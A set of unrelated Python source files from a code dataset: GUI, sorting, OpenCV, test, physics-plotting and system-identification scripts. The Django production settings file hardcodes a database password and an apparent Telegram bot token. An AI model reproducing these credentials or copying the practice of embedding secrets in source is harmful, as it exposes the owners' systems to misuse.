sticky=E+W)\n\n btn_next = Button(pframe, text='Next', command=\\\n lambda: get_next_picture(lbl_image,searchiter))\n btn_next.grid(row=3, column=1, sticky=E+W)\n\n iframe = Frame(root, bd=2, relief=SUNKEN)\n\n stringvars['host'] = StringVar(\"\")\n stringvars['name'] = StringVar(\"\")\n stringvars['link'] = StringVar(\"\")\n stringvars['ratios'] = StringVar(\"\")\n\n generate_ratio_values(search)\n set_values(search)\n tbox_name_text = stringvars['name']\n tbox_name = Entry(iframe, textvariable=tbox_name_text, width=40)\n tbox_name.grid(row=0, column=0, sticky=N+W+E)\n\n tbox_host_text = stringvars['host']\n tbox_host = Entry(iframe, textvariable=tbox_host_text, width=40)\n tbox_host.grid(row=1, column=0, sticky=N+W+E)\n\n tbox_link_text = stringvars['link']\n tbox_link = Entry(iframe, textvariable=tbox_link_text, width=40)\n tbox_link.grid(row=2, column=0, sticky=N+E+W)\n\n tbox_ratio_text = stringvars['ratios']\n tbox_ratio = Entry(iframe, textvariable=tbox_ratio_text, width=40)\n tbox_ratio.grid(row=3, column=0, sticky=N+E+W)\n\n pframe.grid(row=0, column=1, rowspan=2, sticky=N+W+E+S)\n iframe.grid(row=1, column=0, sticky=N+E+S+W)\n \n\nif __name__ == '__main__':\n global stringvars, itemiter\n itemlist = list(pm.getMissing())\n shuffle(itemlist)\n itemiter = ItemListIterator(itemlist)\n\n stringvars = {}\n\n root = Tk()\n #root.minsize(500, 200)\n\n #picture_frame(root)\n main_frame(root, itemiter)\n\n\n\n root.mainloop()\n","sub_path":"CostcoOld/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"441950142","text":"class Stack:\n def __init__(self):\n self.arr = []\n\n def isempty(self):\n if self.arr:\n return False\n else:\n return True\n\n def peek(self):\n if not self.isempty():\n return self.arr[-1]\n else:\n return None\n \n def pop(self):\n if not self.isempty():\n val = self.arr[-1]\n del(self.arr[-1])\n return val\n else:\n print('No element to delete')\n\n def push(self,x):\n self.arr.append(x)\n\n def printstack(self):\n if not self.isempty():\n for i in 
self.arr:\n print(i, end = ' ')\n print()\n else:\n print('Stack is empty')\n\n def sort(self):\n reserve = Stack()\n while not self.isempty():\n temp = self.pop()\n while not reserve.isempty() and reserve.peek() > temp:\n self.push(reserve.pop())\n reserve.push(temp)\n while not reserve.isempty():\n self.push(reserve.pop())\n\ndef main():\n stack = Stack()\n stack.push(6)\n stack.push(85)\n stack.push(3)\n stack.push(1)\n stack.push(10)\n stack.push(2)\n stack.printstack()\n stack.sort()\n stack.printstack()\n print(stack.peek())\n\nif __name__=='__main__':\n main() ","sub_path":"Chapter 3/3.5.py","file_name":"3.5.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"595051412","text":"import pytest\nfrom pages.label import Label\nfrom utility.logger import *\n\n\n@pytest.fixture()\ndef label_obj():\n label_obj = Label()\n yield label_obj\n label_obj.del_all()\n\n\n@pytest.mark.POST\ndef test_create_label(label_obj):\n try:\n assert label_obj.create_label_on_board(correct_red_label) == SUCCESS\n except Exception as err:\n logger.error(err)\n raise err\n\n\n@pytest.mark.DELETE\ndef test_del_a_label_on_board(label_obj):\n try:\n assert label_obj.del_a_label_on_board() == SUCCESS\n except Exception as err:\n logger.error(err)\n raise err\n\n\n@pytest.mark.PUT\ndef test_update_color(label_obj):\n try:\n assert label_obj.update_label_color() == SUCCESS\n except Exception as err:\n logger.error(err)\n raise err\n\n\n@pytest.mark.GET\ndef test_get_label_info(label_obj):\n try:\n assert label_obj.get_label_info() == SUCCESS\n except Exception as err:\n logger.error(err)\n raise err\n","sub_path":"tests/test_label.py","file_name":"test_label.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"556929646","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Hash code 2018.\n\nRunner of the simulations. 
Submissions files will be put into the named dir.\n\"\"\"\nimport os\nfrom code.hashcode import Simulation\n\nCHALLENGES = ['harthiya','mansour','zayona', 'karada']\n\nfor challenge in CHALLENGES:\n print('##### Executing simulation %s #####' % challenge)\n input_filename = os.path.join('datas', '%s.csv' % challenge)\n simulation = Simulation(input_filename)\n simulation.launch_simulation()\n simulation.submit()\n","sub_path":"Hackathon/hashcode2018-master/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"138443267","text":"import cv2\nimport numpy as np\n\n\noriginal_image = cv2.imread(\"./public/saved_images/originalImage.jpg\")\n\ndef biggestContour(contours):\n biggest = np.array([])\n max_area = 0\n for i in contours:\n area = cv2.contourArea(i)\n if area > 50:\n peri = cv2.arcLength(i, True)\n approx = cv2.approxPolyDP(i, 0.02 * peri, True)\n if area > max_area and len(approx) == 4:\n biggest = approx\n max_area = area\n return biggest,max_area\n\n\ndef pre_process_image(img):\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # CONVERT IMAGE TO GRAY SCALE\n imgBlur = cv2.GaussianBlur(imgGray, (5, 5), 1) # ADD GAUSSIAN BLUR\n imgThreshold = cv2.adaptiveThreshold(imgBlur, 255, 1, 1, 11, 2) # APPLY ADAPTIVE THRESHOLD\n return imgThreshold\n\n\nthreshold_img = pre_process_image(original_image) \n\ncontours, hierarchy = cv2.findContours(threshold_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) \nframe = None\n\nbiggest, maxArea = biggestContour(contours) # FIND THE BIGGEST CONTOUR\nif (biggest.size !=0): \n perimeter = cv2.arcLength(biggest,True)\n \n approx = cv2.approxPolyDP(biggest,0.02*perimeter,True)\n\n ax = approx.item(0)\n ay = approx.item(1)\n bx = approx.item(2)\n by = approx.item(3)\n cx = approx.item(4)\n cy = approx.item(5)\n dx = approx.item(6)\n dy = approx.item(7)\n\n w,h = 900,900\n \n \n pt1 = np.float32([[bx,by],[ax,ay],[cx,cy],[dx,dy]])\n pt2 = np.float32([[0,0],[w,0],[0,h],[w,h]])\n\n matrix = cv2.getPerspectiveTransform(pt1,pt2)\n img_perspective = cv2.warpPerspective(original_image,matrix,(w,h))\n\n frame = cv2.cvtColor(img_perspective,cv2.COLOR_BGR2GRAY)\n frame = cv2.rotate(frame,cv2.ROTATE_90_COUNTERCLOCKWISE)\n cv2.imwrite(\"./public/saved_images/frame_binary.jpg\",frame)\nelse:\n print(\"No frame detected\")\n exit(1)\n\n","sub_path":"extractFrame.py","file_name":"extractFrame.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"631294924","text":"from __future__ import print_function\nimport sys\nimport string\nfrom matrix import *\nimport numpy as np\nfrom eigen import *\nimport math\n\nif len(sys.argv)>1 : \n n = int(sys.argv[1])\n\nelse:\n n = 4\n\n\nprint(\"Testing cyclic eigenvalue decomposition\")\n\nA = matrix(n, n)\n\n\nfor ii in range(0, n):\n A[ii,ii] = np.random.random()\n for jj in range(ii, n):\n const = np.random.random()\n A[ii, jj] = const\n A[jj, ii] = const\n\n\n\nprint(\"Original matrix, A:\")\nmatrix.printing(A)\n\nD, V = jacobi_cycle(A, 1e-6)\n\n\nprint('V: ')\nmatrix.printing(V)\n\nprint(\"Diagonalized eigenvalue matrix, D:\")\nmatrix.printing(D)\nprint(\"Testing V^{T}AV = D:\")\nmatrix.printing(matrix_mult(trans(V), matrix_mult(A, V)))\n#\"\"\"\n#eigen_by_eigen(A, 1, 
1e-6)\n#\"\"\"\n\n\n","sub_path":"problems/eigenvalues/main_cyclic.py","file_name":"main_cyclic.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"591548571","text":"from random import shuffle\n\ndef partition(a, start, end):\n pivot_guess = ( start + int((end - start)/2))\n initial_pivot_val = a[pivot_guess]\n sorted_upto = start\n a[pivot_guess], a[end] = a[end], a[pivot_guess]\n for i in xrange(start, end):\n if a[i] < initial_pivot_val:\n a[i], a[sorted_upto] = a[sorted_upto], a[i]\n sorted_upto += 1\n \n a[end], a[sorted_upto] = a[sorted_upto], a[end]\n return sorted_upto\n\ndef quick_sort(a, start, end):\n if start >= end:\n return\n p = partition(a, start, end)\n quick_sort(a, start, p-1)\n quick_sort(a, p+1, end)\n\n\nif __name__ == '__main__':\n \n a = range(1,100000)\n shuffle(a)\n quick_sort(a, 0, len(a)-1)\n assert(all([a[i] <= a[i+1] for i in xrange(len(a) - 1)]))\n","sub_path":"practice/quicksort_practice.py","file_name":"quicksort_practice.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"366481206","text":"class Student:\n def __init__(self,name,hometown,age,height,favorite_ice_cream):\n self.name=name\n self.hometown=hometown\n self.age=age\n self.height=height\n self.favorite_ice_cream=favorite_ice_cream\n\n def print_summary(self):\n print(self.name)\n print(self.hometown)\n print(self.age)\n print(self.height)\n print(self.favorite_ice_cream)\n\n def get_giraffe_gap(self):\n giraffe=500\n return(giraffe-self.height)\n \n \n \n##from student import student\n##my_student=student(\"may\",\"hifa\",\"15\",\"160\",\"vanilla cookies\")\n##my_student.get_giraffe_gap(\"160\")\n","sub_path":"student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"276153274","text":"#!/usr/bin/env python3\nimport atlas_mpl_style as atlas\nimport numpy as np\nimport numexpr as ne\nimport scipy.stats as stats\nimport scipy.interpolate as interp\nfrom statsmodels.nonparametric.kernel_regression import KernelReg\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import AutoMinorLocator\nfrom matplotlib.markers import CARETUP\nimport argparse\nimport pickle\nimport ROOT as r\nr.PyConfig.IgnoreCommandLineOptions = True\n\nfrom root_pandas import read_root # noqa\natlas.use_atlas_style()\n\n\nclass FitFunction:\n def __init__(self, x, y, yerr=None):\n reg = KernelReg([y], [x], var_type='c', reg_type='ll')\n vals = reg.fit(x)[0]\n self.spline = interp.UnivariateSpline(\n x, vals, w=np.isfinite(vals), ext='const')\n # calculate RMS and normalize to stop normalization drifting\n xs = np.linspace(np.min(x), np.max(x), 1000)\n ys = self.spline(xs)\n self.rms = np.sqrt(np.sum(ys**2) / 1000)\n\n def __repr__(self):\n return f'RMS: {self.rms:.4g}, Spline: {str(self.spline.get_coeffs())}'\n\n def fit(self, x):\n return self.spline(x) / self.rms\n\n\n# import root_numpy as rnp\n# import rootpy as rpy\n\nparser = argparse.ArgumentParser(\n description=\"Plot data and background (QCD and MC)\", prog='plot.py')\nparser.add_argument(\n '--no-kinematic-reweighting',\n dest='no_kinematic_reweighting',\n default=False,\n action='store_true'\n)\nparser.add_argument(\n '--mc',\n dest='mc',\n action='append',\n nargs=2,\n metavar=('MC_label', 'MC_file'),\n help='MC 
backgrounds')\nparser.add_argument(\n '--norm',\n dest='norm',\n action='store',\n type=float,\n default='0.084',\n help='QCD normalization')\n\nparser.add_argument(\n '-f',\n dest='f',\n action='store',\n type=float,\n default='0.22',\n help='n-jets factor')\nparser.add_argument(\n 'region',\n choices=['signal', 'control', 'sideband'],\n default='signal',\n help='HH mass region',\n action='store')\nparser.add_argument(\n 'var',\n choices=[\n 'm_hh', 'm_h1', 'pT_h1', 'eta_h1', 'm_h2', 'pT_h2', 'eta_h2', 'njets',\n 'pT_4', 'pT_2', 'eta_i', 'dRjj_1', 'dRjj_2'\n ],\n default='m_hh',\n help='Variable to plot',\n action='store')\nparser.add_argument(\n 'data', action='store', metavar='data_file', help='Data ROOT file')\nargs = parser.parse_args()\nf = args.f\nif args.region == 'signal':\n args.region = 'sig' # match tree name\n\nvar_labels = {\n 'm_hh': r'$m_{hh}$ [GeV]',\n 'm_h1': r'$m^{\\textsf{lead}}_{h}$ [GeV]',\n 'pT_h1': r'$p_T^{\\textsf{lead}}$ [GeV]',\n 'eta_h1': r'$\\eta^{\\textsf{lead}}$ [GeV]',\n 'm_h2': r'$m^{\\textsf{sublead}}_{h}$ [GeV]',\n 'pT_h2': r'$p_T^{\\textsf{sublead}}$ [GeV]',\n 'eta_h2': r'$\\eta^{\\textsf{sublead}}$ [GeV]',\n 'njets': r'$n_{\\textsf{jets}}$',\n 'pT_4': r'$p_{T}(h_4)$ [GeV]',\n 'pT_2': r'$p_{T}(h_2)$ [GeV]',\n 'eta_i': r'$\\left< \\left| \\eta_i \\right| \\right>$',\n 'dRjj_1': r'$\\Delta R(j_1, j_2)$',\n 'dRjj_2': r'$\\Delta R(j_3, j_4)$'\n}\n\n# Kinematic reweighting\nif args.no_kinematic_reweighting:\n def reweight(df):\n pass\nelse:\n with open(\"reweight.pickle\", mode='rb') as file:\n all_rwgt_funcs = pickle.load(file)\n\n def reweight(df):\n sf = np.ones(df.shape[0])\n for rwgt in all_rwgt_funcs:\n for k, v in rwgt.items():\n if k == 'rwgt_pT_4':\n sel = df[k].values < 80\n sf[sel] *= v.fit(df[sel][k].values)\n else:\n sf *= v.fit(df[k].values)\n df['kinematic_sf'] = sf\n# End of kinematic reweighting\n\n\ndef nJetsWeight(f, ntag, njets):\n to_pick = 4 - ntag\n pick_from = njets - ntag\n return 1 - stats.binom.cdf(to_pick - 1, n=pick_from, p=f)\n\n\ndef plot_hists(hists, bins, ax=None):\n cumulative = np.zeros_like(hists[0][1])\n cumulative_errs = np.zeros_like(hists[0][1], dtype=np.float64)\n x = np.stack((bins[:-1], bins[1:])).ravel(1)\n if ax is None:\n ax = plt.gca()\n for label, hist, sumw2 in hists:\n y_low = np.stack((cumulative, cumulative)).ravel(1)\n y_high = np.stack((hist, hist)).ravel(1)\n ax.plot(x, y_high, color='k', lw='0.5')\n ax.fill_between(x, y_high, y_low, label=label)\n # ax.bar(x=x, height=hist, width=width, bottom=cumulative, label=label)\n cumulative += hist\n cumulative_errs += sumw2\n cumulative_errs = np.sqrt(cumulative_errs)\n return cumulative, cumulative_errs\n\n\ndef weighted_chisquare(f_obs, f_exp, f_obs_err, f_exp_err):\n \"Calculate weighted chi-square using method in arxiv:physics/0605123\"\n # selection = np.logical_and(f_obs >= 10, f_exp >= 10)\n selection = True\n w1 = f_obs[selection]\n w2 = f_exp[selection]\n s1 = f_obs_err[selection] # noqa\n s2 = f_exp_err[selection] # noqa\n W1 = np.sum(w1) # noqa\n W2 = np.sum(w2) # noqa\n X2 = ne.evaluate(\n \"sum((W1*w2 - W2*w1)**2 / (W1**2 * s2**2 + W2**2 * s1**2))\")\n p = stats.chi2.sf(X2, np.size(w1) - 1)\n return (X2, p)\n\n\nif args.var in ['njets']:\n var = args.var\nelif args.var in [\n 'm_hh', 'm_h1', 'pT_h1', 'eta_h1', 'm_h2', 'pT_h2', 'eta_h2'\n]:\n var = f'event_{args.var}'\nelif args.var in ['pT_4', 'pT_2', 'eta_i', 'dRjj_1', 'dRjj_2']:\n var = f'rwgt_{args.var}'\n\ndata, bins = np.histogram(\n read_root(args.data, 
args.region).query('ntag==4')[var].values,\n bins=(np.arange(3.5, 10.0, step=1) if var == 'njets' else 30))\nbin_centers = (bins[1:] + bins[:-1]) / 2\n\nfig, ax, ratio_ax = atlas.ratio_axes()\n\nbkgs = []\nmc_2tag = np.zeros_like(data, dtype=np.float64)\nmc_2tag_sumw2 = np.zeros_like(data, dtype=np.float64)\nif args.mc is None:\n args.mc = []\nfor mc in args.mc:\n df_4tag = read_root(mc[1], args.region).query('ntag==4')\n hist_4tag, _ = np.histogram(\n df_4tag[var].values, bins=bins, weights=df_4tag['mc_sf'].values)\n hist_4tag_sumw2, _ = np.histogram(\n df_4tag[var].values, bins=bins, weights=(df_4tag['mc_sf'].values**2))\n df_2tag = read_root(mc[1], args.region).query('ntag==2')\n reweight(df_2tag)\n hist_2tag, _ = np.histogram(\n df_2tag[var].values,\n bins=bins,\n weights=(df_2tag['mc_sf'].values * nJetsWeight(\n f, 2, df_2tag['njets'].values) * args.norm\n * df_2tag['kinematic_sf'].values))\n hist_2tag_sumw2, _ = np.histogram(\n df_2tag[var].values,\n bins=bins,\n weights=(df_2tag['mc_sf'].values * nJetsWeight(\n f, 2, df_2tag['njets'].values) * args.norm\n * df_2tag['kinematic_sf'].values)**2)\n\n mc_2tag += hist_2tag\n mc_2tag_sumw2 += hist_2tag_sumw2\n bkgs.append((mc[0], hist_4tag, hist_4tag_sumw2))\n\nqcd_df = read_root(args.data, args.region).query('ntag==2')\nreweight(qcd_df)\nqcd, _ = np.histogram(\n qcd_df[var].values,\n bins=bins,\n weights=(nJetsWeight(f, 2, qcd_df['njets'].values)\n * args.norm * qcd_df['kinematic_sf'].values))\nqcd -= mc_2tag # Subtract off 2 tag MCs\nqcd_sumw2, _ = np.histogram(\n qcd_df[var].values,\n bins=bins,\n weights=(nJetsWeight(f, 2, qcd_df['njets'].values)\n * args.norm * qcd_df['kinematic_sf'].values)**2)\nqcd_sumw2 += mc_2tag_sumw2 # Errors add\n\nbkg, bkg_err = plot_hists(bkgs + [('QCD', qcd, qcd_sumw2)], bins, ax=ax)\n# bkg_err = np.sqrt((0.1*bkg)**2 + bkg_err**2)\nax.errorbar(bin_centers, data, yerr=np.sqrt(data), fmt='ko', label='Data 16')\nx2, p = weighted_chisquare(data, bkg, np.sqrt(data), bkg_err)\nbkg_yield = np.sum(bkg)\ndata_yield = np.sum(data)\n\nhandles, labels = ax.get_legend_handles_labels()\nax.legend(reversed(handles), reversed(labels), loc='upper right')\n\nbkg_err /= bkg # proportional errors\nbkg_err = np.stack((bkg_err, bkg_err)).ravel(1) # double up\n\nratio_ax.plot([bins[0], bins[-1]], [0, 0], color='black')\nratio_ax.fill_between(\n np.stack((bins[:-1], bins[1:])).ravel(1),\n bkg_err,\n -bkg_err,\n color='black',\n alpha=0.3)\nratio = (data - bkg) / bkg\nratio_ax.errorbar(\n bin_centers, ratio, yerr=(np.sqrt(data) * (ratio / data)), fmt='ko')\nout_of_range = np.where(ratio > 1, 1, np.where(ratio < -1, -1, np.NaN))\nratio_ax.plot(bin_centers, out_of_range, marker=CARETUP, color='paper:red')\nratio_ax.set_ylabel(\n r\"$\\frac{\\textsf{Data} - \\textsf{Bkg}}{\\textsf{Bkg}}$\", fontsize=12)\nratio_ax.set_ylim((-1, 1))\nratio_ax.yaxis.set_minor_locator(AutoMinorLocator())\nax.yaxis.set_minor_locator(AutoMinorLocator())\natlas.set_xlabel(var_labels[args.var], ax=ratio_ax)\nax.set_ylim((0, ax.get_ylim()[1]))\natlas.set_ylabel('Events', ax=ax)\n\nregion = args.region\nif region == 'sig':\n region = 'signal'\nregion = region.capitalize()\n\natlas.draw_atlas_label(\n 0.3,\n 0.97,\n ax=ax,\n status='int',\n energy='13 TeV',\n lumi=24,\n desc=(fr'{region} Region \\\\ $\\chi^2={x2:.3f},\\ p={p:.3f}$ \\\\'\n fr'Bkg. 
Yield = {bkg_yield:.2f}, \\\\'\n fr'Data Yield = {data_yield:.5g}'),\n lumi_lt=True)\nfig.savefig(f'{args.var}-{region}-f{f}.pdf', transparent=True)\n","sub_path":"analysis/boosted/tools/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":8967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"62989820","text":"# coding: utf-8\n\nfrom __future__ import (\n unicode_literals, print_function, absolute_import, division\n)\n\nimport os\n\nDEBUG = False\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nHOME_DIR = os.path.dirname(BASE_DIR)\nLOGS_DIR = os.path.join(HOME_DIR, \"logs\")\nSTATIC_ROOT = os.path.join(HOME_DIR, \"static\")\nMEDIA_ROOT = os.path.join(HOME_DIR, \"media\")\n\nALLOWED_HOSTS = [\n \"karma.grumbler.me\"\n]\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'HOST': '127.0.0.1',\n 'USER': 'karma',\n 'PASSWORD': \"*&Gasdf8gb&*Gxhabd\",\n 'NAME': 'karma',\n }\n}\n\nBOT_TOKEN = \"199502282:AAFVQvi5jRGfjxMqHND6lVFCji4qvA53yPQ\"\n\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose',\n },\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': os.path.join(LOGS_DIR, \"app.log\"),\n },\n },\n 'loggers': {\n 'root': {\n 'handlers': ['console', 'file'],\n 'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),\n },\n 'bot': {\n 'handlers': ['console', 'file'],\n 'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),\n },\n 'karma': {\n 'handlers': ['console', 'file'],\n 'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),\n },\n 'django': {\n 'handlers': ['console', 'file'],\n 'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),\n },\n },\n}\n","sub_path":"karma/settings_prod.py","file_name":"settings_prod.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"224352532","text":"import random\n\nSIZE = 8\n\ndef main():\n \n def setTable( table ):\n options = []\n values = {}\n amount = SIZE - 3\n \n for i in range( amount ):\n options.append( i + 1 )\n for key in range( amount ):\n values[ key + 1 ] = 0\n for x in range( SIZE ):\n for y in range( SIZE ):\n if x == 0 or y == 0 or x == SIZE - 1 or y == SIZE - 1:\n table[ x ][ y ] = \" \"\n elif x == 1 and y == 1:\n table[ x ][ y ] = \"+\"\n elif x == 1:\n table[ x ][ y ] = \"-\"\n elif y == 1:\n table[ x ][ y ] = \"|\"\n else:\n selected = random.randint( 0, amount - 1 )\n while values[ options[ selected ] ] >= amount:\n selected = random.randint( 0, amount - 1 )\n values[ options [ selected ] ] += 1\n table[ x ][ y ] = str( options[ selected ] )\n for x in range( SIZE ):\n if x - 1 > 0:\n table[ 0 ][ x ] = str( x - 1 )\n table[ x ][ 0 ] = str( x - 1 )\n table[ 0 ][ SIZE - 1 ] = \"TOTAL\"\n table[ 1 ][ SIZE - 1 ] = \"-\"\n table[ SIZE - 1 ][ 0 ] = \"TOTAL\"\n table[ SIZE - 1 ][ 1 ] = \"|\"\n \n def displayTable( table ):\n calculateTotals( table )\n for x in range( SIZE ):\n for y in range( SIZE ):\n print( table[ x ][ y ], end = '\\t' )\n print()\n print()\n def swapNumbers( table ):\n amount = SIZE - 3\n \n firstRow = int( input( \"The row of the first number: \" ) )\n while firstRow < 1 or firstRow > amount:\n firstRow = int( input( 
\"The row of the first number: \" ) )\n firstColumn = int( input( \"The column of the first number: \" ) )\n while firstColumn < 1 or firstColumn > amount:\n firstColumn = int( input( \"The column of the first number: \" ) )\n secondRow = int( input( \"The row of the second number: \" ) )\n while secondRow < 1 or secondRow > amount:\n secondRow = int( input( \"The row of the second number: \" ) )\n secondColumn = int( input( \"The column of the second number: \" ) )\n while secondColumn < 0 or secondColumn > amount:\n secondColumn = int( input( \"The column of the second number: \" ) )\n temp = table[ secondRow + 1 ][ secondColumn + 1 ]\n table[ secondRow + 1 ][ secondColumn + 1 ] = table[ firstRow + 1 ][ firstColumn + 1 ]\n table[ firstRow + 1 ][ firstColumn + 1 ] = temp\n\n def calculateTotals( table ):\n for x in range( 2, SIZE ):\n table[ x ][ SIZE - 1 ] = 0\n table[ SIZE - 1 ][ x ] = 0\n for x in range( 2, SIZE ):\n totalRow = 0\n totalColumn = 0\n for y in range( 2, SIZE ):\n totalRow += int( table[ x ][ y ] )\n totalColumn += int( table[ y ][ x ] )\n table[ x ][ SIZE - 1 ] = totalRow\n table[ SIZE - 1 ][ x ] = totalColumn\n\n def isFinished( table ):\n amount = table[ 2 ][ SIZE - 1 ]\n \n for x in range( 2, SIZE - 1 ):\n if table[ x ][ SIZE - 1 ] != amount or table[ SIZE - 1 ][ x ] != amount:\n return False\n return True\n \n table = [ [ 0 for x in range( SIZE ) ] for y in range( SIZE ) ]\n turns = 0\n setTable( table )\n displayTable( table )\n while not isFinished( table ):\n swapNumbers( table )\n displayTable( table )\n turns += 1\n print(\"Thanks for playing took you \" + str( turns ) + \" turns to finish\")\nmain()\n","sub_path":"Numbers.py","file_name":"Numbers.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"105217012","text":"from random import randint\n\ndef sortear_dado():\n return randint(1,60)\n\ndef gera_cartao():\n resultado=[]\n final=0\n for i in range(1, 2146): \n numero = sortear_dado()\n if numero not in resultado:\n resultado.append(numero)\n final+=1\n if final == 6:\n print(sorted(resultado))\n break\n\ngera_cartao()","sub_path":"fundamentos/mega_sena_2145.py","file_name":"mega_sena_2145.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"315540436","text":"\"\"\"\nUnit testing.\n\"\"\"\nimport unittest\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport sysid\nimport time\nimport sysid.subspace\n\n# pylint: disable=invalid-name, no-self-use\n\nENABLE_PLOTTING = False\n\n\nclass TestSubspace(unittest.TestCase):\n \"\"\"\n Unit testing.\n \"\"\"\n\n def test_block_hankel(self):\n \"\"\"\n Block hankel function.\n \"\"\"\n y = np.random.rand(3, 100)\n Y = sysid.subspace.block_hankel(y, 5)\n self.assertEqual(Y.shape, (15, 95))\n\n def test_block_hankel_long(self):\n \"\"\"\n Block hankel function.\n \"\"\"\n y = np.random.rand(200, 3000)\n Y = sysid.subspace.block_hankel(y, 5)\n self.assertEqual(Y.shape, (1000, 2995))\n\n def test_project(self):\n A = np.array([[1, 2, 3], [3, 2, 1], [7, 8, 9]])\n print(A)\n Y = sysid.subspace.project(A)\n print(Y)\n # self.assertEqual(Y, np.array([[1.78125, 1.4375, 1.09375], [0.875, 1., 1.125], [-0.28125, 0.0625, 0.40625]]))\n\n\n def test_project_perp(self):\n A = np.array([[1, 2, 3], [3, 2, 1], [7, 8, 9]])\n print(A)\n Y = sysid.subspace.project_perp(A)\n print(Y)\n # [[-0.78125 - 1.4375 - 1.09375]\n # [-0.875 0. 
- 1.125]\n # [0.28125 - 0.0625 0.59375]]\n\n def test_project_oblique(self):\n A = np.array([[1, 2, 3], [3, 2, 1], [7, 8, 9]])\n print(A)\n B = np.array([[3, 2, 3], [3, 2, 2], [7, 8, 7]])\n print(B)\n Y = sysid.subspace.project_oblique(A, B)\n print(Y)\n # [[ 1.00000000e+00 8.88178420e-16 2.22044605e-15]\n # [ 1.22124533e-15 1.00000000e+00 1.22124533e-15]\n # [ 5.37764278e-16 -9.71445147e-16 1.00000000e+00]]\n\n def test_svd(self):\n \"\"\"\n Block hankel function.\n \"\"\"\n y = np.random.rand(100, 0)\n\n def test_subspace_simulate(self):\n # ss1 = sysid.ss.StateSpaceDiscreteLinear(\n # A=0.9, B=0.5, C=1, D=0, Q=0.01, R=0.01, dt=0.1)\n ss1 = sysid.StateSpaceDiscreteLinear(\n A=np.array([[0.9]]),\n B=np.array([[0.5]]),\n C=np.array([[1]]),\n D=np.array([[0]]),\n Q=np.diag([0.01]), R=np.diag([0.01]), dt=0.1)\n\n np.random.seed(1234)\n # prbs1 = np.array(np.matrix(sysid.subspace.prbs(1000)))\n prbs1 = sysid.subspace.prbs(1000)\n def f_prbs(t, x, i):\n return prbs1[i]\n tf = 10\n data = ss1.simulate(f_u=f_prbs,\n # x0=np.array(0),\n x0=np.array([[0]]).T,\n tf=tf)\n\n def test_subspace_det_algo1_siso(self):\n \"\"\"\n Subspace deterministic algorithm (SISO).\n \"\"\"\n ss1 = sysid.StateSpaceDiscreteLinear(\n A=0.9, B=0.5, C=1, D=0, Q=0.01, R=0.01, dt=0.1)\n\n np.random.seed(1234)\n prbs1 = sysid.prbs(1000)\n\n def f_prbs(t, x, i):\n \"input function\"\n # pylint: disable=unused-argument, unused-variable\n return prbs1[i]\n\n tf = 10\n data = ss1.simulate(f_u=f_prbs, x0=np.matrix(0), tf=tf)\n ss1_id = sysid.subspace_det_algo1(\n y=data.y, u=data.u,\n f=5, p=5, s_tol=1e-1, dt=ss1.dt)\n data_id = ss1_id.simulate(f_u=f_prbs, x0=0, tf=tf)\n nrms = sysid.subspace.nrms(data_id.y, data.y)\n self.assertGreater(nrms, 0.9)\n\n if ENABLE_PLOTTING:\n plt.plot(data_id.t.T, data_id.x.T, label='id')\n plt.plot(data.t.T, data.x.T, label='true')\n plt.legend()\n plt.grid()\n\n\n def test_subspace_det_algo1_mimo(self):\n \"\"\"\n Subspace deterministic algorithm (MIMO).\n \"\"\"\n ss2 = sysid.StateSpaceDiscreteLinear(\n A=np.array([[0, 0.1, 0.2],\n [0.2, 0.3, 0.4],\n [0.4, 0.3, 0.2]]),\n B=np.array([[1, 0],\n [0, 1],\n [0, -1]]),\n C=np.array([[1, 0, 0],\n [0, 1, 0]]),\n D=np.array([[0, 0],\n [0, 0]]),\n Q=np.diag([0.01, 0.01, 0.01]), R=np.diag([0.01, 0.01]), dt=0.1)\n np.random.seed(1234)\n prbs1 = 